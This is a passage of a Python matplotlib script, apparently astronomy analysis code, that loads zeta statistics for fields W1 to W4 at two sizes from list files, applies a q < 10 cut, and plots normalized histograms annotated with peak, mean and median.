q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
# Draw each normalized histogram once.  (The original repeated every
# plt.hist call with identical arguments; the duplicates only overplotted
# the same lines and doubled the legend labels, so they are removed.)
ax = plt.subplot(454)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
# Per-curve "peak, mean, median" labels; only the peak depends on the binning.
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 4
# Progress report: fraction of points per field surviving the q < 10 cut.
print("finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size))
# --- Subplot 5 of 16: zeta_M^2 statistic, read from column `cols` of the
# per-field fieldshist* list files.  Same pipeline as the other subplots:
# load, apply the q < 10 cut, histogram, annotate peak / mean / median.
cols=9
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
# Draw each normalized histogram once.  (The original repeated every
# plt.hist call with identical arguments; the duplicates only overplotted
# the same lines and doubled the legend labels, so they are removed.)
ax = plt.subplot(456)
rangemax=7
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
# Per-curve "peak, mean, median" labels; only the peak depends on the binning.
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M^2}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 5
# Progress report: fraction of points per field surviving the q < 10 cut.
print("finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size))
# --- Subplot 6 of 16: zeta_M^2_rms statistic, read from column `cols` of
# the per-field fieldshist* list files.  Same pipeline as the other
# subplots: load, apply the q < 10 cut, histogram, annotate statistics.
cols=11
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
# Draw each normalized histogram once.  (The original repeated every
# plt.hist call with identical arguments; the duplicates only overplotted
# the same lines and doubled the legend labels, so they are removed.)
ax = plt.subplot(457)
rangemax=6
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
# Per-curve "peak, mean, median" labels; only the peak depends on the binning.
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M^2_{rms}}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 6
# Progress report: fraction of points per field surviving the q < 10 cut.
print("finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size))
# --- Subplot 7 of 16: zeta_M^3 statistic, read from column `cols` of the
# per-field fieldshist* list files.  Same pipeline as the other subplots:
# load, apply the q < 10 cut, histogram, annotate peak / mean / median.
cols=13
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
# Draw each normalized histogram once.  (The original repeated every
# plt.hist call with identical arguments; the duplicates only overplotted
# the same lines and doubled the legend labels, so they are removed.)
ax = plt.subplot(458)
rangemax=6
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
# Per-curve "peak, mean, median" labels; only the peak depends on the binning.
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M^3}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 7
# Progress report: fraction of points per field surviving the q < 10 cut.
print("finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size))
cols=15
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(459)
rangemax=7
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
